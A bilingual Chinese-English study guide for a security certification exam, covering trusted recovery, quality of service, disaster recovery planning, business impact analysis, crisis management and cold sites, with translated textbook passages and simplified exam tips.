可信恢复确保在发生故障或崩溃后,系统安全性与故障或崩溃发生前一样。 根 据故障类型,恢复过程可能是自动的,也可能需要管理员手动干预。 然而,在 任何情况下,系统都可以设计为支持可信恢复。 系统可以被设计为在故障时进入故障安全状态或故障开放状态。 一个故障安全 系统在发生故障时会默认进入安全状态,阻止所有访问,从而确保系统安全失 效。 一个故障开放系统在故障时会进入开放状态,授予所有访问权限。 选择哪 种方式取决于故障后安全性和可用性哪个更为重要。 有关这些主题的完整讨论 见第8章,“安全模型、设计与能力的原则”。 为实现可信解决方案,恢复过程涉及两个要素。 第一个要素是故障准备,包括 系统弹性与容错方法,以及可靠的备份解决方案。 第二个要素是系统恢复过程。 系统应被强制重启为单用户、非特权状态。 这意味着系统重启后,应允许使用 普通用户账户登录,且不会向用户授予未经授权的访问权限。 系统恢复还包括 恢复故障或崩溃时系统上所有受影响的文件和正在积极使用的服务。 所有缺失 或损坏的文件将被恢复,任何分类标签的更改将被修正,并对所有安全关键文 件的设置进行验证。 通用准则包含一个关于可信恢复的章节,该章节与系统的弹性和容错性相关。

具体而言,它定义了四种类型的可信恢复: 手动恢复 如果系统发生故障,它不会以安全状态失败。 相反,需要管理员手动 执行必要的操作,以在故障或系统崩溃后实现安全或可信恢复。 自动恢复 系统能够执行可信恢复操作,以应对至少一种类型的故障。 例如, 硬件RAID可以针对硬盘故障提供自动恢复,但无法应对整个服务器的故障。 某些类型的故障仍需要手动恢复。 无重大损失的自动恢复 这与自动恢复类似,系统能够针对至少一种

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 25 / PDF P1241

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

type of failure. However, it includes mechanisms to ensure that specific objects are protected to prevent their loss. A method of automated recovery that protects against undue loss would include steps to restore data or other objects. It may include additional protection mechanisms to restore corrupted files, rebuild data from transaction logs, and verify the integrity of key system and security components. Function Recovery Systems that support function recovery are able to automatically recover specific functions.

This state ensures that the system is able to successfully complete the recovery for the functions, or that the system will be able to roll back the changes to return to a secure state. Quality of Service Quality of service (QoS) controls protect the availability of data networks under load. Many different factors contribute to the quality of the end-user experience, and QoS attempts to manage all of those factors to create an experience that meets business requirements. Some of the factors contributing to QoS are as follows: Bandwidth The network capacity available to carry communications. Latency The time it takes a packet to travel from source to destination.

Jitter The variation in latency between different packets. Packet Loss Some packets may be lost between source and destination, requiring retransmission. Interference Electrical noise, faulty equipment, and other factors may corrupt the contents of packets. In addition to controlling these factors, QoS systems often prioritize certain traffic types that have low tolerance for interference and/or have high business requirements. For example, a QoS device might be programmed to prioritize videoconference traffic from the executive conference room over video streaming from an intern's computer.

QoS may also include specific security requirements, such as requiring encryption for certain types of traffic. Recovery Strategy

中文直译 / 整理

类型的故障进行自我恢复。 然而,它包含确保特定对象受到保护以防止其丢失 的机制。 一种防止重大损失的自动恢复方法将包括恢复数据或其他对象的步骤。 它可能还包括额外的保护机制,以恢复损坏的文件、从事务日志中重建数据, 并验证关键系统和安全组件的完整性。 功能恢复 支持功能恢复的系统能够自动恢复特定功能。 此状态确保系统能够成 功完成功能的恢复,或能够回滚更改以返回到安全状态。 服务质量 服务质量(QoS) 控制在负载情况下保护数据网络的可用性。 许多不同因素 会影响最终用户的体验质量,QoS 旨在管理所有这些因素,以创造符合业务 需求的体验。 影响 QoS 的一些因素如下: 带宽 用于传输通信的网络容量。 延迟 数据包从源到目的地所需的时间。 抖动 不同数据包之间延迟的变化。 丢包 部分数据包可能在源和目的之间丢失,需要重传。 干扰 电气噪声、设备故障和其他因素可能会损坏数据包的内容。 除了控制这些因素外,QoS 系统通常会优先处理对干扰容忍度低和/或业务要 求高的特定流量类型。 例如,QoS 设备可能被配置为优先处理来自高管会议 室的视频会议流量,而非实习生计算机上的视频流。

QoS 还可能包含特定的 安全要求,例如要求对某些类型的流量进行加密。 恢复策略

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

加密:加密把内容变成未授权者看不懂的形式。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
加密 加密把内容变成未授权者看不懂的形式。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 26 / PDF P1242

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

When a disaster interrupts your business, your disaster recovery plan should kick in nearly automatically and begin providing support for recovery operations. The disaster recovery plan should be designed so that the first employees on the scene can immediately begin the recovery effort in an organized fashion, even if members of the official DRP team have not yet arrived on-site. In the following sections, we'll cover critical subtasks involved in crafting an effective disaster recovery plan that can guide rapid restoration of regular business processes and resumption of activity at the primary business location.

In addition to improving your response capabilities, purchasing insurance can reduce the impact of financial losses. When selecting insurance, be sure to purchase sufficient coverage to enable you to recover from a disaster. Simple value coverage may be insufficient to encompass actual replacement costs. If your property insurance includes an actual cash value (ACV) clause, then your damaged property will be compensated based on the fair market value of the items on the date of loss, less all accumulated depreciation since the time of their purchase.

The important point here is that unless you have a replacement cost clause in your insurance coverage, your organization is likely to have to pay out of pocket as a result of any losses it might sustain. Many insurance providers offer cybersecurity liability policies that specifically cover breaches of confidentiality, integrity, and availability. Valuable paper insurance coverage provides protection for inscribed, printed, and written documents and manuscripts and other printed business records. However, it does not cover damage to paper money and printed security certificates.

Business Unit and Functional Priorities To recover your business operations with the greatest possible efficiency, you must engineer your disaster recovery plan so that those business units with the highest priority are recovered first. You must identify and prioritize critical business functions as well so that you can define which functions you want to restore after a disaster or failure and in what order. The business impact analysis (BIA) you developed during your business continuity work is an excellent resource when performing this task.

To achieve this goal, the DRP team must first identify the critical business units that are vital to achieving your organization's mission and agree on an order of prioritization, and they must do likewise with business functions.

中文直译 / 整理

当灾难干扰您的业务时,您的灾难恢复计划应几乎自动启动,并开始提供恢复 操作支持。 灾难恢复计划应设计为,即使官方 DRP 团队成员尚未到达现场,现 场的第一批员工也能立即有条不紊地开始恢复工作。 在以下章节中,我们将介 绍制定有效灾难恢复计划所需的关键子任务,该计划可指导快速恢复常规业务 流程,并在主要业务地点重新开展活动。 除了提升您的响应能力外,购买保险可以减少财务损失的影响。 在选择保险时, 请务必购买足够的保障,以便在灾难发生后能够恢复。 简单的价值保障可能不 足以涵盖实际的替换成本。 如果您的财产保险包含实际现金价值(ACV)条款, 则您的受损财产将根据损失当日物品的公允市场价值,并扣除自购买以来累积 的所有折旧进行赔偿。 这里的关键是,除非您的保险保障中包含重置成本条款, 否则您的组织在遭受任何损失时都可能需要自掏腰包。 许多保险公司提供专门 覆盖机密性、完整性和可用性泄露的网络安全责任保险。 重要文件保险提供对铭刻、印刷和手写文件、手稿及其他印刷商业记录的保护。 然而,它不涵盖纸币和印刷证券的损坏。 业务单元与功能优先级 为了以最大的效率恢复您的业务运营,您必须设计灾难恢复计划,优先恢复最 高优先级的业务单元。

您还必须识别并确定关键业务功能的优先级,以便明确 在灾难或故障发生后希望恢复哪些功能以及恢复顺序。 在业务连续性工作中您 所开发的业务影响分析(BIA)是执行此任务的绝佳资源。 为实现这一目标,DRP团队必须首先确定对实现贵组织使命至关重要的关键业务 单元,并就优先级顺序达成一致; 同时,他们也必须对业务职能做同样的处理。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

证书不是密钥本身,而是身份与公钥的可信绑定。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 27 / PDF P1243

第 1243 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

And take note: Not all critical business functions will necessarily be carried out in critical business units, so the final results of this analysis will very probably comprise a superset of critical business units plus other select units. If this process sounds familiar, it should! This is very much like the prioritization task the BCP team performs during the business impact assessment discussed in Chapter 3. In fact, most organizations will complete a BIA as part of their business continuity planning process.

This analysis identifies vulnerabilities, develops strategies to minimize risk, and ultimately produces a BIA report that describes the potential risks that an organization faces and identifies critical business units and functions. A BIA also identifies costs related to failures that include loss of cash flow, equipment replacement, salaries paid to clear work backlogs, profit losses, opportunity costs from the inability to attract new business, and so forth.

Such failures are assessed in terms of potential impacts on finances, personnel, safety, legal compliance, contract fulfillment, and quality assurance, preferably in monetary terms to make impacts comparable and to set budgetary expectations. With all this BIA information in hand, you should use the resulting documentation as the basis for this prioritization task. At a minimum, the output from this task should be a simple listing of business units in priority order. However, a more detailed list, broken down into specific business processes listed in order of priority, would be a much more useful deliverable.

This business process–oriented list is more reflective of real-world conditions, but it requires considerable additional effort. It will, however, greatly assist in the recovery effort—after all, not every task performed by the highest-priority business unit will be of the highest priority. You might find that it would be best to restore the highestpriority unit to 50 percent capacity and then move on to lower-priority units to achieve some minimum operating capacity across the organization before attempting a full recovery effort. By the same token, the same exercise must be completed for critical business processes and functions.

Not only can these things involve multiple business units and cross the lines between them, but they also define the operational elements that must be restored in the wake of a disaster or other business interruption. Here also, the final result should be a checklist of items in priority order, each with its own risk and cost assessment, and a corresponding set of recovery objectives and milestones. As discussed in Chapter 3, these include the mean time to repair (MTTR), maximum tolerable downtime (MTD), recovery time objective (RTO), and recovery

中文直译 / 整理

请注意:并非所有关键业务职能都必然在关键业务单元中执行,因此本分析的 最终结果很可能包括关键业务单元的超集,以及其他一些选定的单元。 如果此过程听起来很熟悉,那确实应该如此! 这与BCP团队在业务影响评估中 执行的优先级排序任务非常相似,该评估在第3章中进行了讨论。 事实上,大多 数组织都会在业务连续性规划过程中完成一份业务影响分析(BIA)。 此分析 识别脆弱性,制定降低风险的策略,并最终生成一份BIA报告,描述组织面临 的主要风险,并确定关键业务单元和职能。 BIA还识别与故障相关的成本,包 括现金流损失、设备更换、为清理积压工作而支付的工资、利润损失、因无法 吸引新业务而导致的机会成本等。 这些故障的影响通常从财务、人员、安全、 法律合规、合同履行和质量保证等方面进行评估,最好以货币形式衡量,以便 比较影响并设定预算预期。 掌握所有这些BIA信息后,您应将由此产生的文档 作为此优先级排序任务的基础。 最低要求是,此任务的输出应为按优先级排序的业务单元简单列表。 然而,一 份更详细的列表,按优先级顺序分解为具体业务流程,将更具实用价值。 这种 以业务流程为导向的列表更能反映现实情况,但需要投入大量额外工作。

然而, 它将极大助力恢复工作——毕竟,并非最高优先级业务单元执行的每一项任务 都具有最高优先级。 您可能会发现,最好先将最高优先级单元恢复至50%的 运行能力,然后转向较低优先级的单元,以在整个组织中实现最低运营能力, 再着手进行全面恢复。 同样地,必须对关键业务流程和功能完成相同的分析。 这些方面不仅可能涉及 多个业务部门并跨越其界限,还定义了在灾难或其他业务中断后必须恢复的操 作要素。 同样,最终结果应是一个按优先级排序的项目清单,每个项目都附有 其自身的风险和成本评估,以及相应的恢复目标和里程碑。 如第3章所述,这 些包括平均修复时间(MTTR)、最大可容忍停机时间(MTD)、恢复时间目 标(RTO)和恢复

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

恢复时间目标 RTO:RTO 是业务或系统最多能中断多久。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1243 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 问时间:多久必须恢复。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
恢复时间目标 RTO RTO 是业务或系统最多能中断多久。
学习单元 28 / PDF P1244

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

point objective (RPO). Business continuity planners can analyze these metrics to identify situations that require intervention and additional controls. Crisis Management If a disaster strikes your organization, panic is likely to set in. The best way to combat this is with an organized disaster recovery plan. The individuals in your business who are most likely to first notice an emergency situation (such as security guards and technical personnel) should be fully trained in disaster recovery procedures and know the proper notification procedures and immediate response mechanisms.

Many things that normally seem like common sense (such as calling emergency services in the event of a fire) may slip the minds of panicked employees seeking to flee an emergency. The best way to combat this is with continuous training on disaster recovery responsibilities. Returning to the fire example, all employees should be trained to activate the fire alarm or contact emergency officials when they spot a fire (after, of course, taking appropriate measures to protect themselves). After all, it's better that the fire department receive 10 different phone calls reporting a fire at your organization than it is for everyone to assume that someone else already took care of it.

Crisis management steps in to cover crises of all forms. These may include more commonplace disasters, such as a facility fire, or more extraordinary events, such as a global pandemic. Organizations may also activate their crisis management programs for events with little impact on technology, such as a public relations disaster. Crisis management is a science and an art form. If your training budget permits, investing in crisis training for your key employees is a good idea. This ensures that at least some of your employees know how to handle emergency situations properly and can provide all-important “on-the-scene” leadership to panic-stricken coworkers.

Emergency Communications When a disaster strikes, it is important that the organization be able to communicate internally as well as with the outside world. A disaster of any significance is easily noticed, but if an organization is unable to keep the outside world informed of its recovery status, the public is apt to fear the

中文直译 / 整理

点目标(RPO)。 业务连续性规划者可以分析这些指标,以识别需要干 预和额外控制的情况。 危机管理 如果灾难袭击您的组织,恐慌很可能会发生。 应对这种情况的最佳方法是制定 有组织的灾难恢复计划。 您的企业中最有可能首先发现紧急情况的人员(如安 保人员和技术人员)应接受完整的灾难恢复程序培训,并了解正确的通知程序 和即时响应机制。 许多通常看似常识的事情(例如发生火灾时拨打紧急服务电话),在恐慌的员 工试图逃离紧急情况时可能会被遗忘。 应对这种情况的最佳方法是持续进行灾 难恢复职责培训。 以火灾为例,所有员工都应接受培训,在发现火灾时启动火 灾警报或联系紧急机构(当然,前提是先采取适当措施保护自身安全)。 毕竟, 让消防部门接到10通报告您组织发生火灾的电话,总比每个人都假设别人已经 处理好了要好。 危机管理涵盖各种形式的危机。 这些危机可能包括更常见的灾难,如设施火灾, 也可能包括更特殊的事件,如全球性流行病。 组织也可能在发生对技术影响较 小的事件时启动危机管理程序,例如公关危机。 危机管理是一门科学,也是一种艺术。 如果您的培训预算允许,为关键员工 提供危机培训是一个好主意。

这可以确保至少部分员工懂得如何妥善应对紧 急情况,并能在惊慌失措的同事面前提供至关重要的“现场”领导。 应急通信 当灾难发生时,组织能够与内部以及外部世界进行沟通至关重要。 任何重大 的灾难都容易被察觉,但如果组织无法向外界通报其恢复状况,公众很容易 产生恐慌,认为

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 29 / PDF P1245

第 1245 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

worst and assume that the organization is unable to recover. It is also essential that the organization be able to communicate internally during a disaster so that employees know what is expected of them—whether they are to return to work or report to another location, for instance. Employees participating in disaster recovery efforts should be instructed to refer media inquiries to the public relations team. You don't want employees naively providing unvarnished assessments of the situation based on partial information to the media and then having those assessments wind up in print.

In some cases, the circumstances that brought about the disaster to begin with may have also damaged some or all normal means of communications. A violent storm or an earthquake may have also knocked out telecommunications systems; at that point, it's too late to try to figure out other means of communicating both internally and externally. Workgroup Recovery When designing a disaster recovery plan, it's important to keep your goal in mind—the restoration of workgroups to the point that they can resume their activities in their usual work locations. It's easy to get sidetracked and think of disaster recovery as purely an IT effort focused on restoring systems and processes to working order.

To facilitate this effort, it's sometimes best to develop separate recovery facilities for different workgroups. For example, if you have several subsidiary organizations that are in different locations and that perform tasks similar to the tasks that workgroups at your office perform, you may want to consider temporarily relocating those workgroups to the other facility and having them communicate electronically and via telephone with other business units until they're ready to return to the main operations facility. Larger organizations may have difficulty finding recovery facilities capable of handling the entire business operation.

This is another example of a circumstance in which independent recovery of different workgroups is appropriate. Alternate Processing Sites One of the most important elements of the disaster recovery plan is the selection of alternate processing sites to be used when the primary sites are

中文直译 / 整理

组织无法恢复。 同时,在灾难期间,组织也必须能够进行内部沟通,以便员工 了解对他们有何要求——例如,他们是否需要返回工作岗位或前往其他地点报 到。 参与灾后恢复工作的员工应被指示将媒体询问转交公关团队。 你不希望员工基 于不完整的信息向媒体提供未经修饰的评估,而这些评估随后被刊登出来。 在某些情况下,导致灾难发生的原因本身也可能破坏了部分或全部正常的通信 手段。 一场猛烈的风暴或地震可能同时导致电信系统瘫痪; 此时再试图寻找其 他内外部沟通方式就为时已晚。 工作组恢复 在制定灾后恢复计划时,重要的是要牢记目标——将工作组恢复到能够在其常 规工作地点重新开展活动的状态。 很容易偏离主题,将灾后恢复仅仅视为以恢 复系统和流程运行为核心的IT工作。 为促进这一工作,有时最好为不同工作组建立独立的恢复设施。 例如,如果你 拥有位于不同地点的多个附属机构,且它们执行的任务与你办公室工作组的任 务相似,你可以考虑暂时将这些工作组 relocating 到其他设施,并通过电子方 式和电话与其他业务部门保持联系,直到他们准备好返回主运营设施。 较大的组织可能难以找到能够处理整个业务运营的恢复设施。

这是另一种情况 下,各个工作小组独立恢复是合适的。 备用处理站点 灾难恢复计划中最重要的要素之一是选择在主要站点无法使用时使用的备用处理 站点

小白解释

场景先行:你是公司的安全负责人,正在读第 1245 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1245 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 30 / PDF P1246

第 1246 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

unavailable. Many options are available when considering recovery facilities, limited only by the creative minds of disaster recovery planners and available resources. In the following sections, we cover several types of sites commonly used in disaster recovery planning: cold sites, warm sites, hot sites, mobile sites, and cloud computing. Organizations building fully resilient processes may use more than one alternate processing site in their disaster recovery plan. Using multiple processing sites increases geographic diversity and resilience.

Cold Sites Cold sites are standby facilities large enough to handle the processing load of an organization and equipped with appropriate functioning electrical and environmental support systems. They may be large warehouses, empty office buildings, or other similar structures. However, a cold site has no computing facilities (hardware or software) preinstalled and also has no active broadband communications links. Many cold sites do have at least a few copper telephone lines, and some sites may have standby links that can be activated with minimal notification.

中文直译 / 整理

不可用。 在考虑恢复设施时,可用的选项多种多样,仅受限于灾难恢复规划者 的创造力和可用资源。 在以下章节中,我们将介绍灾难恢复规划中常用的几种 站点类型:冷站点、温站点、热站点、移动站点和云计算。 构建完全弹性流程的组织可在其灾难恢复计划中使用多个备用处理 站点。 使用多个处理站点可提高地理多样性与弹性。 冷站点 冷站点是规模足以承担组织处理负载的备用设施,并配备了适当的供电和环境 支持系统。 它们可能是大型仓库、空置的办公楼或其他类似结构。 然而,冷站 点没有预先安装任何计算设施(硬件或软件),也没有活跃的宽带通信链路。 许多冷站点至少配备了几条铜质电话线,有些站点可能拥有可在极少通知下激 活的备用链路。

小白解释

场景先行:你是公司的安全负责人,正在读第 1246 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1246 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 31 / PDF P1247

第 1247 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Cold Site Setup A cold site setup is well depicted in the film Boiler Room, which involves a chop-shop investment firm telemarketing bogus pharmaceutical investment deals to prospective clients. In this fictional case, the “disaster” is human-made, but the concept is much the same, even if the timing is quite different. Under threat of exposure and a pending law enforcement raid, the firm establishes a nearby building that is empty, save for a few banks of phones on dusty concrete floors in a mock-up of a cold recovery site.

Granted, this work is both fictional and illegal, but it illustrates a very real and legitimate reason for maintaining a redundant failover recovery site for the purpose of business continuity. Research the various forms of recovery sites, and then consider which among them is best suited for your particular business needs and budget. A cold site is the least expensive option and perhaps the most practical. A warm site contains the data links and preconfigured equipment necessary to begin restoring operations but no usable data or information.

The most expensive option is a hot site, which fully replicates your existing business infrastructure and is ready to take over for the primary site on short notice. The major advantage of a cold site is its relatively low cost—there's no computing base to maintain and no monthly telecommunications bill when the site is idle. However, the drawbacks of such a site are obvious—there is a tremendous lag between the time the decision is made to activate the site and the time when that site is ready to support business operations. Servers and workstations must be brought in and configured. Data must be restored from backup tapes. Communications links must be activated or established.

The time to activate a cold site is often measured in weeks, making a quick recovery close to impossible and often yielding a false sense of security. It's also worth observing that the substantial time, effort, and expense required to activate and transfer operations to a cold site make this approach the most difficult to test.

中文直译 / 整理

